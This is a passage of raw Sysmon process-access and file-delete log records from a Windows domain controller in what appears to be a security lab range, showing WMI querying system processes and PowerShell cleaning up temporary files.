4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E1AA-00000000AD01}9004C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E1AA-00000000AD01}9004C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0xvzdlzo.od2.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 